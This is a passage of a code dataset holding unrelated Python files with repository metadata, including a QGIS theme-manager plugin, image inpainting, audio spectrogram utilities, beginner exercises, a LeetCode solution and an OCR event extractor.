return open(path, 'r')\n\n def fill_listView(self, themes):\n self.editTheme_button.setEnabled(False)\n self.deleteTheme_button.setEnabled(False)\n self.openProject_button.setEnabled(False)\n self.showQWC2_button.setEnabled(False)\n for index, theme in enumerate(themes):\n if \"title\" in theme.keys():\n self.defaultTheme_comboBox.addItem(theme[\"title\"])\n list_item = QListWidgetItem(theme[\"title\"])\n theme[\"index\"] = index\n list_item.setData(Qt.UserRole, theme)\n self.themes_listWidget.addItem(list_item)\n else:\n if \"url\" not in theme.keys():\n continue\n title = os.path.basename(theme[\"url\"])\n self.defaultTheme_comboBox.addItem(title)\n list_item = QListWidgetItem(title)\n theme[\"index\"] = index\n list_item.setData(Qt.UserRole, theme)\n self.themes_listWidget.addItem(list_item)\n self.themes_listWidget.clearSelection()\n\n def save_themes_config(self):\n config_path = os.path.join(\n self.qwc2Dir_lineEdit.text(), \"themesConfig.json\")\n themes_config = self.read_themes_config(config_path)\n themes_dict = json.load(themes_config)\n themes_config.close()\n if self.defaultScales_lineEdit.text():\n themes_dict[\"defaultScales\"] = [\n int(num.strip()) for num in\n self.defaultScales_lineEdit.text().split(\",\")]\n else:\n themes_dict[\"defaultScales\"] = [1000000, 500000, 250000, 100000,\n 50000, 25000, 10000, 5000, 2500,\n 1000, 500]\n if self.defaultPrintScales_lineEdit.text():\n themes_dict[\"defaultPrintScales\"] = [\n int(num.strip()) for num in\n self.defaultPrintScales_lineEdit.text().split(\",\")]\n else:\n if \"defaultPrintScales\" in themes_dict.keys():\n themes_dict.pop(\"defaultPrintScales\")\n if self.defaultPrintResolutions_lineEdit.text():\n themes_dict[\"defaultPrintResolutions\"] = [\n int(num.strip()) for num in\n self.defaultPrintResolutions_lineEdit.text().split(\",\")]\n else:\n if \"defaultPrintResolutions\" in themes_dict.keys():\n themes_dict.pop(\"defaultPrintResolutions\")\n if \"themes\" in themes_dict.keys() and \"items\" in themes_dict[\n \"themes\"].keys():\n for theme in themes_dict[\"themes\"][\"items\"]:\n if \"default\" in theme.keys():\n theme.pop(\"default\")\n if \"title\" in theme.keys():\n if self.defaultTheme_comboBox.currentText() == theme[\n \"title\"]:\n theme[\"default\"] = True\n continue\n elif \"url\" in theme.keys():\n title = os.path.basename(theme[\"url\"])\n if self.defaultTheme_comboBox.currentText() == title:\n theme[\"default\"] = True\n continue\n try:\n themes_config = open(config_path, 'w')\n themes_config.write(json.dumps(themes_dict, indent=2,\n sort_keys=True))\n themes_config.close()\n except PermissionError:\n QMessageBox.critical(\n None, \"QWC2 Theme Manager: Permission Error\",\n \"Cannot create/override themes configuration file\"\n \"\\nInsufficient permissions!\")\n QgsMessageLog.logMessage(\n \"Permission Error: Cannot \"\n \"create/override file: %s.\" % config_path,\n \"QWC2 Theme Manager\", Qgis.Critical)\n self.gen_complete_config()\n self.load_themes_config()\n\n def create_or_edit_theme(self, method):\n if method == \"create\":\n settings_dlg = self.theme_settings_dialog = ThemeSettingsDialog(\n self.iface.mainWindow(), method, self.iface,\n self.defaultTheme_comboBox.count())\n if settings_dlg.exec_() == 1:\n return\n self.load_themes_config()\n self.save_themes_config()\n else:\n theme = self.themes_listWidget.selectedItems()\n if not theme:\n QMessageBox.warning(None, \"QWC2 Theme Manager\",\n \"No theme selected.\")\n return\n settings_dlg = self.theme_settings_dialog = ThemeSettingsDialog(\n self.iface.mainWindow(), method, self.iface,\n self.defaultTheme_comboBox.count(), theme[0].data(Qt.UserRole))\n if settings_dlg.exec_() == 1:\n return\n self.load_themes_config()\n self.save_themes_config()\n self.enable_publish_button()\n self.gen_complete_config()\n\n def delete_theme(self):\n theme = self.themes_listWidget.selectedItems()\n if not theme:\n QMessageBox.warning(None, \"QWC2 Theme Manager\",\n \"No theme selected.\")\n return\n\n res = QMessageBox.question(\n None, \"QWC2 Theme Manager\",\n \"Do you really want to delete the selected theme?\")\n if res == QMessageBox.No:\n return\n\n config_path = os.path.join(self.settings.value(\n \"qwc2-themes-manager/qwc2_directory\"), \"themesConfig.json\")\n theme = theme[0].data(Qt.UserRole)\n index = theme.pop(\"index\")\n\n try:\n themes_config = open(config_path, \"r\", encoding=\"utf-8\")\n themes_dict = json.load(themes_config)\n removed_theme = themes_dict[\"themes\"][\"items\"].pop(index)\n themes_config.close()\n themes_config = open(config_path, \"w\", encoding=\"utf-8\")\n themes_config.write(json.dumps(themes_dict, indent=2,\n sort_keys=True))\n themes_config.close()\n except PermissionError:\n QMessageBox.critical(\n None, \"QWC2 Theme Manager: Permission Error\",\n \"Cannot delete the selected theme\"\n \"\\nInsufficient permissions!\")\n QgsMessageLog.logMessage(\n \"Permission Error: Cannot open/override \"\n \"file: %s.\" % config_path,\n \"QWC2 Theme Manager\", Qgis.Critical)\n return\n\n self.load_themes_config()\n self.enable_publish_button()\n self.gen_complete_config()\n\n res = QMessageBox.question(\n None, \"QWC2 Theme Manager\",\n \"Do you also want to delete the QGIS project of \"\n \"the deleted Theme?\")\n if res == QMessageBox.No:\n return\n\n try:\n projects_dir_path = os.path.join(self.settings.value(\n \"qwc2-themes-manager/project_directory\"),\n os.path.basename(removed_theme[\"url\"]))\n os.remove(projects_dir_path + \".qgs\")\n except PermissionError:\n QMessageBox.critical(\n None, \"QWC2 Theme Manager: Permission Error\",\n \"Cannot delete the project\"\n \"\\nInsufficient permissions!\")\n QgsMessageLog.logMessage(\n \"Permission Error: Cannot Delete the project with \"\n \"the path: %s.\" % projects_dir_path,\n \"QWC2 Theme Manager\", Qgis.Critical)\n return\n except FileNotFoundError:\n QgsMessageLog.logMessage(\n \"Delete project Error: The path: %s doesn't \"\n \"exist.\" % projects_dir_path,\n \"QWC2 Theme Manager\", Qgis.Warning)\n\n def open_project(self):\n theme = self.themes_listWidget.selectedItems()\n if not theme:\n QMessageBox.warning(None, \"QWC2 Theme Manager\",\n \"No theme selected.\")\n return\n project_name = os.path.basename(\n theme[0].data(Qt.UserRole)[\"url\"]) + \".qgs\"\n projects_dir_path = os.path.join(\n self.projectsDir_lineEdit.text(), project_name)\n if os.path.exists(projects_dir_path):\n opened = QgsProject.instance().read(projects_dir_path)\n if not opened:\n QMessageBox.critical(\n None, \"QWC2 Theme Manager\",\n \"Couldn't open the project of the selected theme.\\n\"\n \"Check if you have the needed permissions to \"\n \"open the project.\")\n else:\n QMessageBox.critical(\n None, \"QWC2 Theme Manager\",\n \"Couldn't find the project of the selected theme.\")\n QgsMessageLog.logMessage(\n \"Project Error: Couldn't open project with the\"\n \" path: %s.\" % projects_dir_path,\n \"QWC2 Theme Manager\", Qgis.Warning)\n\n def open_qwc2(self):\n theme = self.themes_listWidget.selectedItems()[0].data(Qt.UserRole)\n url = os.path.join(\n self.qwc2Url_lineEdit.text(), \"?t=\") + os.path.basename(\n theme[\"url\"])\n if not url.startswith(\"http\"):\n url = \"http://\" + url\n webbrowser.open(url)\n\n def reset_ui(self):\n self.defaultScales_lineEdit.setText(\n \"1000000,500000,250000,100000,50000,\"\n \"25000,10000,5000,2500,1000,500\")\n self.defaultPrintScales_lineEdit.setText(\"\")\n self.defaultPrintResolutions_lineEdit.setText(\"\")\n self.defaultTheme_comboBox.clear()\n self.themes_listWidget.clear()\n\n def check_numbers(self, lineEdit):\n numbers_list = lineEdit.text()\n if not numbers_list:\n lineEdit.setStyleSheet(\"background: #FFFFFF; color: #000000;\")\n self.activate_save_button()\n return\n for number in numbers_list.split(\",\"):\n if number.isdigit():\n continue\n else:\n lineEdit.setStyleSheet(\"background: #FF7777; color: #FFFFFF;\")\n self.activate_save_button()\n return\n self.activate_save_button()\n lineEdit.setStyleSheet(\"background: #FFFFFF; color: #000000;\")\n\n def check_permissions(self, path):\n if not os.path.isdir(path):\n msg = \"This path does not exist\"\n return False, msg\n elif not os.access(path, os.R_OK):\n msg = \"Insufficient permissions(read)\"\n return False, msg\n elif not os.access(path, os.W_OK):\n msg = \"Insufficient permissions(write)\"\n return False, msg\n else:\n return True, None\n\n def enable_publish_button(self):\n if not QgsProject.instance().baseName():\n return\n self.addTheme_button.setEnabled(True)\n for index in range(self.themes_listWidget.count()):\n if os.path.basename(\n self.themes_listWidget.item(\n index).data(Qt.UserRole)[\n \"url\"]) == QgsProject.instance().baseName():\n self.addTheme_button.setEnabled(False)\n\n def enable_buttons(self):\n self.editTheme_button.setEnabled(True)\n self.deleteTheme_button.setEnabled(True)\n self.openProject_button.setEnabled(True)\n self.enable_qwc2_button()\n\n def enable_qwc2_button(self):\n if self.qwc2Url_lineEdit.text() and \\\n self.themes_listWidget.selectedItems():\n self.showQWC2_button.setEnabled(True)\n else:\n self.showQWC2_button.setEnabled(False)\n\n def activate_save_button(self):\n notok_style = \"background: #FF7777; color: #FFFFFF;\"\n if self.defaultScales_lineEdit.styleSheet() == notok_style:\n self.buttonBox.button(QDialogButtonBox.Save).setEnabled(False)\n elif self.defaultPrintScales_lineEdit.styleSheet() == notok_style:\n self.buttonBox.button(QDialogButtonBox.Save).setEnabled(False)\n elif self.defaultPrintResolutions_lineEdit.styleSheet() == notok_style:\n self.buttonBox.button(QDialogButtonBox.Save).setEnabled(False)\n else:\n self.buttonBox.button(QDialogButtonBox.Save).setEnabled(True)\n\n def gen_complete_config(self):\n if self.themes_listWidget.count() == 0:\n return\n os.chdir(self.qwc2Dir_lineEdit.text())\n script_path = os.path.join(os.path.dirname(__file__),\n \"themesConfig.py\")\n output = subprocess.Popen(['python3', script_path],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n\n stdout, stderr = output.communicate()\n if stderr.decode(\"utf-8\"):\n QMessageBox.warning(\n None, \"QWC2 Theme Manager\",\n \"Couldn't generate themes.json\\n\"\n \"Please run the script: themesConfig.py manually to generate\"\n \"the themes.json file.\")\n QgsMessageLog.logMessage(\n \"Python execution error: \\n%s\" % stderr.decode(\"utf-8\"),\n \"QWC2 Theme Manager\", Qgis.Critical)\n","repo_name":"HusseinKabbout/qwc2-themes-manager","sub_path":"themes_manager_dockwidget.py","file_name":"themes_manager_dockwidget.py","file_ext":"py","file_size_in_byte":23707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"21063596674","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 3 21:36:36 2019\n\n@author: Nataly\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom skimage import data\nfrom skimage.restoration import inpaint\nimport cv2\n\nfile='00033'\nimage_orig=cv2.imread(file+'.jpg')\n#image_orig=cv2.cvtColor(img,cv2.COLOR_RGB2BGR)\n##plt.imshow(image_orig)\n##plt.show()\nmask =cv2.imread(file+'_seg.jpg',0)\n\n#cv2.imshow('',mask)\n#cv2.waitKey(0)\n#cv2.destroyAllWindows()\n\n# Defect image over the same region in each color channel\nimage_defect = image_orig.copy()\nfor layer in range(image_defect.shape[-1]):\n image_defect[np.where(mask)] = 0\n\n#plt.imshow(image_defect)\n#plt.show()\nimage_result =inpaint.inpaint_biharmonic(image_orig, mask,multichannel=True)\n\nimage_result =inpaint.inpaint_biharmonic(image_defect, mask, multichannel=3)\n#plt.imshow(image_result)\n#plt.show()\n\n#cv2.imshow('',image_result)\n#cv2.waitKey(0)\n#cv2.destroyAllWindows()\n#\n\nimgs= cv2.normalize(image_result, None, 0, 255, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_8UC3)\ncv2.imshow('',imgs)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\ndire='./'+file+'_inpaiting_B.png'\ncv2.imwrite(dire,imgs)\nk = cv2.waitKey(1000)\ncv2.destroyAllWindows()\n\n","repo_name":"NatalyTinoco/Trabajo-de-grado_Artefactos","sub_path":"Método de corrección/test_corrección/inpaitingB.py","file_name":"inpaitingB.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"3580415116","text":"#11. As Organizações Tabajara resolveram dar um aumento de salário aos seus colaboradores e lhe contraram para desenvolver o programa que calculará os reajustes.\n\n #Faça um programa que recebe o salário de um colaborador e o reajuste segundo o seguinte critério, baseado no salário atual:\n #salários até R$ 280,00 (incluindo) : aumento de 20%\n #salários entre R$ 280,00 e R$ 700,00 : aumento de 15%\n #salários entre R$ 700,00 e R$ 1500,00 : aumento de 10%\n #salários de R$ 1500,00 em diante : aumento de 5%\n \n #Após o aumento ser realizado, informe na tela:\n #o salário antes do reajuste;\n #o percentual de aumento aplicado;\n #o valor do aumento;\n #o novo salário, após o aumento.\n\nsalarioAtual = float(input(\"Digite o salário atual: \\n\"))\nporcentagem = 0\nsalarioReajuste = salarioAtual\n\nif salarioAtual <= 280:\n porcentagem = 20\n aumento = salarioAtual * porcentagem / 100\n salarioReajuste = salarioAtual + aumento\nelif 280 < salarioAtual <= 700:\n porcentagem = 15\n aumento = salarioAtual * porcentagem / 100\n salarioReajuste = salarioAtual + aumento\nelif 700 < salarioAtual <= 1500:\n porcentagem = 10\n aumento = salarioAtual * porcentagem / 100\n salarioReajuste = salarioAtual + aumento\nelse:\n porcentagem = 5\n aumento = salarioAtual * porcentagem / 100\n salarioReajuste = salarioAtual + aumento\n\nprint(\"O salário atual é de R$\" + str(salarioAtual) + \". O aumento será de \" + str(porcentagem) + \"%, que equivale a R$\" + str(aumento) + \". Portanto, o novo salário será de R$\" + str(salarioReajuste) + \".\")","repo_name":"Brunarnm/python_exercicios","sub_path":"02_EstruturaDeDecisão/ex11.py","file_name":"ex11.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"33718634353","text":"import os\nimport numpy as np\nimport scipy\nimport librosa\nimport soundfile\nimport matplotlib.pyplot as plt\nimport glob\n\n#########################################################################\n# Some of these functions have been inspired on the DCASE UTIL framework by Toni Heittola\n# https://dcase-repo.github.io/dcase_util/\n#########################################################################\n\n\ndef load_audio_file(file_path, input_fixed_length=0, pextract=None):\n\n try:\n data, source_fs = soundfile.read(file=file_path)\n data = data.T\n except:\n print('ERROR: Soundfile has crashed while reading {}'.format(file_path))\n print('Returning NONE and skipping this file. TO BE REMOVED FROM CSV.')\n return None\n\n # Resample if the source_fs is different from expected\n if pextract.get('fs') != source_fs:\n data = librosa.core.resample(data, source_fs, pextract.get('fs'))\n\n if len(data) > 0:\n data = get_normalized_audio(data)\n else:\n raise ValueError ('File corrupted. Could not open: %s' % file_path)\n # data = np.ones((input_fixed_length, 1))\n # print('File corrupted. Could not open: %s' % file_path)\n\n # careful with the shape\n data = np.reshape(data, [-1, 1])\n return data\n\n\n\ndef modify_file_variable_length(data=None, input_fixed_length=0, pextract=None):\n \"\"\"\n data is the entire audio file loaded, with proper shape\n -depending on the loading mode (in pextract)\n --FIX: if sound is short, replicate sound to fill up to input_fixed_length\n if sound is too long, grab only a (random) slice of size input_fixed_length\n --VARUP: short sounds get replicated to fill up to input_fixed_length\n --VARFULL: this function is a by pass (full length is considered, whatever that is)\n\n :return:\n \"\"\"\n\n # deal with short sounds\n if len(data) <= input_fixed_length:\n if pextract.get('load_mode') == 'fix' or pextract.get('load_mode') == 'varup':\n if pextract.get('fill') == 'rep':\n # if file shorter than input_length, replicate the sound to reach the input_fixed_length\n nb_replicas = int(np.ceil(input_fixed_length / len(data)))\n # replicate according to column\n data_rep = np.tile(data, (nb_replicas, 1))\n data = data_rep[:input_fixed_length]\n\n elif pextract.get('fill') == 'zp':\n # if file shorter than input_length, zeropad the sound to reach the input_fixed_length\n data = librosa.util.fix_length(data, input_fixed_length)\n else:\n raise ValueError('unknown filling method')\n\n else:\n # deal with long sounds\n if pextract.get('load_mode') == 'fix':\n # if file longer than input_length, grab input_length from a random slice of the file\n max_offset = len(data) - input_fixed_length\n offset = np.random.randint(max_offset)\n data = data[offset:(input_fixed_length + offset)]\n\n return data\n\ndef get_normalized_audio(y, head_room=0.005):\n\n mean_value = np.mean(y)\n y -= mean_value\n\n max_value = max(abs(y)) + head_room\n return y / max_value\n\n\ndef get_mel_spectrogram(audio, pextract=None):\n \"\"\"Mel-band energies\n\n Parameters\n ----------\n audio : numpy.ndarray\n Audio data.\n params : dict\n Parameters.\n\n Returns\n -------\n feature_matrix : numpy.ndarray\n (log-scaled) mel spectrogram energies per audio channel\n\n \"\"\"\n # make sure rows are channels and columns the samples\n audio = audio.reshape([1, -1])\n window = scipy.signal.hamming(pextract.get('win_length_samples'), sym=False)\n\n mel_basis = librosa.filters.mel(sr=pextract.get('fs'),\n n_fft=pextract.get('n_fft'),\n n_mels=pextract.get('n_mels'),\n fmin=pextract.get('fmin'),\n fmax=pextract.get('fmax'),\n htk=pextract.get('htk'),\n norm=pextract.get('mel_basis_unit'))\n\n if pextract.get('normalize_mel_bands'):\n mel_basis /= np.max(mel_basis, axis=-1)[:, None]\n\n # init mel_spectrogram expressed as features: row x col = frames x mel_bands = 0 x mel_bands (to concatenate axis=0)\n feature_matrix = np.empty((0, pextract.get('n_mels')))\n for channel in range(0, audio.shape[0]):\n spectrogram = get_spectrogram(\n y=audio[channel, :],\n n_fft=pextract.get('n_fft'),\n win_length_samples=pextract.get('win_length_samples'),\n hop_length_samples=pextract.get('hop_length_samples'),\n spectrogram_type=pextract.get('spectrogram_type') if 'spectrogram_type' in pextract else 'magnitude',\n center=True,\n # center=False,\n window=window,\n pextract=pextract\n )\n\n mel_spectrogram = np.dot(mel_basis, spectrogram)\n mel_spectrogram = mel_spectrogram.T\n # at this point we have row x col = time x freq = frames x mel_bands\n\n if pextract.get('log'):\n mel_spectrogram = np.log10(mel_spectrogram + pextract.get('eps'))\n\n feature_matrix = np.append(feature_matrix, mel_spectrogram, axis=0)\n\n return feature_matrix\n\n\n\ndef get_spectrogram(y,\n n_fft=1024,\n win_length_samples=0.04,\n hop_length_samples=0.02,\n window=scipy.signal.hamming(1024, sym=False),\n center=True,\n spectrogram_type='magnitude',\n pextract=None):\n\n \"\"\"Spectrogram\n\n Parameters\n ----------\n y : numpy.ndarray\n Audio data\n n_fft : int\n FFT size\n Default value \"1024\"\n win_length_samples : float\n Window length in seconds\n Default value \"0.04\"\n hop_length_samples : float\n Hop length in seconds\n Default value \"0.02\"\n window : array\n Window function\n Default value \"scipy.signal.hamming(1024, sym=False)\"\n center : bool\n If true, input signal is padded so to the frame is centered at hop length\n Default value \"True\"\n spectrogram_type : str\n Type of spectrogram \"magnitude\" or \"power\"\n Default value \"magnitude\"\n\n Returns\n -------\n np.ndarray [shape=(1 + n_fft/2, t), dtype=dtype]\n STFT matrix\n\n \"\"\"\n\n if spectrogram_type == 'magnitude':\n return np.abs(librosa.stft(y + pextract.get('eps'),\n n_fft=n_fft,\n win_length=win_length_samples,\n hop_length=hop_length_samples,\n center=center,\n window=window))\n elif spectrogram_type == 'power':\n return np.abs(librosa.stft(y + pextract.get('eps'),\n n_fft=n_fft,\n win_length=win_length_samples,\n hop_length=hop_length_samples,\n center=center,\n window=window)) ** 2\n else:\n message = 'Unknown spectrum type [{spectrogram_type}]'.format(\n spectrogram_type=spectrogram_type\n )\n raise ValueError(message)\n\n\ndef get_mel_spectrogram_lib(audio, pextract=None):\n\n audio = audio.reshape([1, -1])\n\n window = scipy.signal.hamming(pextract.get('win_length_samples'), sym=False)\n\n mel_spectrogram = librosa.feature.melspectrogram(y=audio[0, :],\n sr=pextract.get('fs'),\n win_length=pextract.get('win_length_samples'),\n hop_length=pextract.get('hop_length_samples'),\n window=window,\n n_fft=pextract.get('n_fft'),\n n_mels=pextract.get('n_mels'),\n center=True,\n # center=False,\n power=2\n ).T\n\n if pextract.get('log'):\n mel_spectrogram = np.log10(mel_spectrogram + pextract.get('eps'))\n\n return mel_spectrogram\n\n\ndef make_sure_isdir(_path):\n \"\"\"\n make sure the a directory at the end of pre_path exists. Else create it\n :param pre_path:\n :param args:\n :return:\n \"\"\"\n # full_path = os.path.join(pre_path, _out_file)\n if not os.path.exists(_path):\n os.makedirs(_path)\n return _path","repo_name":"edufonseca/uclser20","sub_path":"extract/wav2spec_utils.py","file_name":"wav2spec_utils.py","file_ext":"py","file_size_in_byte":8856,"program_lang":"python","lang":"en","doc_type":"code","stars":88,"dataset":"github-code","pt":"39"} +{"seq_id":"16479669987","text":"num = int(input(\"Enter a number: \"))\nlst = []\nfinal = {}\nval = []\nfor i in range(num): \n k = input(\"Enter the years: \")\n \n lst.append(k)\n\nfor i in lst:\n k = i[0:2]\n m = k + \"th\"\n if m not in final.keys():\n \n final[m] = [i]\n else:\n \n val = final[m]\n print(val)\n val.append(i)\n final[m] = val\nprint(final)","repo_name":"ikramulkayes/University_Practice","sub_path":"practice25.py","file_name":"practice25.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"24033488483","text":"import numpy as np\nimport sympy as sp\n\n# Define the matrix\nA = np.array([[3, 7, 9,],[5, 2, 1,],[-2, -9, 8]])\n\n# Convert the matrix to a SymPy matrix\nA_sym = sp.Matrix(A)\n\n# Convert the matrix to its row echelon form\nrref = A_sym.rref()[0]\n\n# Convert the row echelon form back to a NumPy array\nechelon = np.array(rref.tolist(), dtype=float)\n\n#Rank of matrix\nrank = np.linalg.matrix_rank(A)\n\n# Print the echelon form and rank of the matrix\nprint(\"Echelon form:\\n\", echelon)\nprint(\"Rank:\", rank)","repo_name":"devanshtyagi26/CompMath","sub_path":"Generate the matrix into echelon form and find its rank.py","file_name":"Generate the matrix into echelon form and find its rank.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"22646710032","text":"# https://leetcode.com/problems/find-valid-matrix-given-row-and-column-sums/\n\nfrom typing import List\n\n\nclass Solution:\n def restoreMatrix(self, rowSum: List[int], colSum: List[int]) -> List[List[int]]:\n matrix = [[0] * len(colSum) for _ in range(len(rowSum))]\n while sum(rowSum + colSum) > 0:\n min_row_val = 1e9\n min_row_index = -1\n min_col_val = 1e9\n min_col_index = -1\n for i in range(len(rowSum)):\n if rowSum[i] != 0 and rowSum[i] < min_row_val:\n min_row_val = rowSum[i]\n min_row_index = i\n for i in range(len(colSum)):\n if colSum[i] != 0 and colSum[i] < min_col_val:\n min_col_val = colSum[i]\n min_col_index = i\n if min_row_val <= min_col_val:\n matrix[min_row_index][min_col_index] = min_row_val\n rowSum[min_row_index] = 0\n colSum[min_col_index] -= min_row_val\n else:\n matrix[min_row_index][min_col_index] = min_col_val\n colSum[min_col_index] = 0\n rowSum[min_row_index] -= min_col_val\n return matrix\n\n\nprint(Solution().restoreMatrix([3, 8], [4, 7]))\n","repo_name":"GeorgianBadita/LeetCode","sub_path":"medium/FindValidMatrixGivenRowAndColumnSums.py","file_name":"FindValidMatrixGivenRowAndColumnSums.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"73378855153","text":"import cv2\nimport numpy as np\nimport imutils\nimport glob\nimport re\nimport os\nimport pytesseract\nfrom pytesseract import image_to_string\nfrom PIL import Image, ImageEnhance, ImageFilter\n\npytesseract.pytesseract.tesseract_cmd = r'C:\\Program Files\\Tesseract-OCR\\tesseract.exe'\n\n'''\n\tnotes:\n\t\t-\tfor get_evet, if OCR does not work propperly, continue to preprocess image. \n\t\t\t\tlink: https://medium.freecodecamp.org/getting-started-with-tesseract-part-ii-f7f9a0899b3f\n'''\n\n\ndef get_event(frame, elements, elements_coord, key, functions, types, input_fields_path):\n text_size = 150\n\n if key in functions:\n function_name = functions[key][0]\n event = function_name + '('\n\n parameters = functions[key][1:]\n for param in parameters:\n if types[param] == 'TextField': # get text in text area\n empty_field = elements[param]\n empty_field = process_image_for_OCR(empty_field, scale_factor=5, filter='bilateralFilter')\n empty_field_text = image_to_string(empty_field, lang='eng')\n split_empty_field_text = re.split(' |\\n', empty_field_text)\n print('---')\n print(split_empty_field_text)\n\n (startX, startY), (endX, endY) = elements_coord[param]\n field_image = frame[startY:endY, startX:endX]\n field_image = process_image_for_OCR(field_image, scale_factor=4)\n field_string = image_to_string(field_image, lang='eng')\n split_field_text = re.split(' |\\n', field_string)\n print(split_field_text)\n print('---')\n\n diff = list_diff(split_field_text, split_empty_field_text)\n text = ' '.join(diff)\n # processed_string = field_string.split(' ')\n # print param + ' - ' + processed_string\n event = event + text + ', '\n\n if types[param] == 'RadioButton': # get text after the checked radio button\n (startX, startY), (endX, endY) = elements_coord[param]\n field_image = frame[startY:endY, startX:endX]\n\n radio_on = cv2.imread(os.path.join(input_fields_path, 'RadioButton_on.png'))\n print('========================== get_event =====================')\n print(radio_on)\n print('========================== end get_event =================')\n\n (startX, startY, endX, endY) = find_element(field_image, radio_on)\n\n textbox_startX, textbox_startY = endX, startY\n textbox_endX, textbox_endY = endX + text_size, endY\n text_image = field_image[textbox_startY:textbox_endY, textbox_startX:textbox_endX]\n # cv2.imwrite('image_of_text.png',text_image)\n text_image = process_image_for_OCR(text_image, scale_factor=2)\n text_string = image_to_string(text_image, lang='eng')\n # cv2.imshow('img',text_image)\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n event = event + text_string + ', '\n\n if types[param] == 'CheckBox':\n options = []\n\n (startX, startY), (endX, endY) = elements_coord[param]\n field_image = frame[startY:endY, startX:endX]\n\n checkbox_on = cv2.imread(os.path.join(input_fields_path, 'CheckBox_on.png'))\n (startX, startY, endX, endY) = find_element(field_image, checkbox_on)\n\n while (startX, startY, endX, endY) != (0, 0, 0, 0):\n textbox_startX, textbox_startY = endX, startY\n textbox_endX, textbox_endY = endX + text_size, endY\n text_image = field_image[textbox_startY:textbox_endY, textbox_startX:textbox_endX]\n # cv2.rectangle(field_image, (textbox_startX, textbox_startY), (textbox_endX, textbox_endY), (51, 255, 153), 3)\n # cv2.imshow('img',field_image)\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n image = process_image_for_OCR(text_image, scale_factor=3)\n text_string = image_to_string(image, lang='eng')\n options.append(text_string)\n field_image[startY:endY, startX:endX] = (0, 0, 0)\n (startX, startY, endX, endY) = find_element(field_image, checkbox_on)\n\n param_value = ''\n for option in options:\n param_value = param_value + ' ' + option\n\n event = event + param_value + ', '\n\n if types[param] == 'PopUp':\n (startX, startY), (endX, endY) = elements_coord[param]\n field_image = frame[startY:endY, startX:endX]\n\n popup_icon = cv2.imread(os.path.join(input_fields_path, 'PopUp_on.png'))\n (startX, startY, endX, endY) = find_element(field_image, popup_icon)\n\n textbox_startX, textbox_startY = startX - text_size, startY\n textbox_endX, textbox_endY = startX, endY\n text_image = field_image[textbox_startY:textbox_endY, textbox_startX:textbox_endX]\n text_image = process_image_for_OCR(text_image, scale_factor=2)\n text_string = image_to_string(text_image, lang='eng')\n\n event = event + text_string + ', '\n\n if len(parameters) > 0:\n event = event[:-2]\n event = event + ')'\n return event\n\n else:\n return None\n\n\ndef process_image_for_OCR(image, scale_factor, filter='GaussianBlur'):\n image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n image = cv2.resize(image, None, fx=scale_factor, fy=scale_factor, interpolation=cv2.INTER_CUBIC)\n # image = cv2.GaussianBlur(image, (5, 5), 0)\n if filter == 'bilateralFilter':\n image = cv2.bilateralFilter(image, 9, 75, 75)\n if filter == 'GaussianBlur':\n image = cv2.GaussianBlur(image, (5, 5), 0)\n image = cv2.threshold(image, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)[1]\n # pil_img = Image.fromarray(image)\n return image\n\n\ndef list_diff(l1, l2):\n for i in l2:\n if i in l1:\n l1.remove(i)\n return l1\n\n\n# def process_image_for_ocr(image,factor):\n# # TODO : Implement using opencv\n# image = set_image_dpi(image,factor)\n# image = remove_noise_and_smooth(image)\n# return image\n\n\n# def set_image_dpi(image, factor):\n# length_x, width_y, _ = image.shape \n# size = factor * length_x, factor * width_y\n# # size = (1800, 1800)\n# im_resized = cv2.resize(image, None, fx=factor, fy=factor, interpolation=cv2.INTER_CUBIC)\n# return im_resized\n\n\n# def image_smoothening(image):\n# ret1, th1 = cv2.threshold(image, BINARY_THREHOLD, 255, cv2.THRESH_BINARY)\n# ret2, th2 = cv2.threshold(th1, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\n# blur = cv2.GaussianBlur(th2, (1, 1), 0)\n# ret3, th3 = cv2.threshold(blur, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\n# return th3\n\n\n# def remove_noise_and_smooth(image):\n# filtered = cv2.adaptiveThreshold(image, 255, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, 41, 3)\n# kernel = np.ones((1, 1), np.uint8)\n# opening = cv2.morphologyEx(filtered, cv2.MORPH_OPEN, kernel)\n# closing = cv2.morphologyEx(opening, cv2.MORPH_CLOSE, kernel)\n# image = image_smoothening(image)\n# or_image = cv2.bitwise_or(image, closing)\n# return or_image\n\ndef get_elements_type(elements):\n types = dict()\n\n for eid in elements.keys():\n types[eid] = eid[eid.find('_') + 1:]\n\n return types\n\n\ndef check_keyframe(frame, old_frame, threshold):\n diff = cv2.absdiff(frame, old_frame)\n non_zeros = np.count_nonzero(diff > 3)\n if non_zeros > threshold:\n return 1\n else:\n return 0\n\n\ndef load_pages(file_name):\n pages = dict()\n # added .lower()\n with open(file_name, \"r\") as input_file:\n for line in input_file:\n string_list = [s.replace('\\n', '') for s in line.split(' ')]\n pages[string_list[0]] = string_list[1:]\n\n return pages\n\n\ndef get_current_page(elements_coord, pages):\n all_pages = set()\n\n for page in pages.values():\n all_pages = all_pages.union(page)\n\n for eid in elements_coord.keys():\n if elements_coord[eid] != [(0, 0), (0, 0)]:\n all_pages = 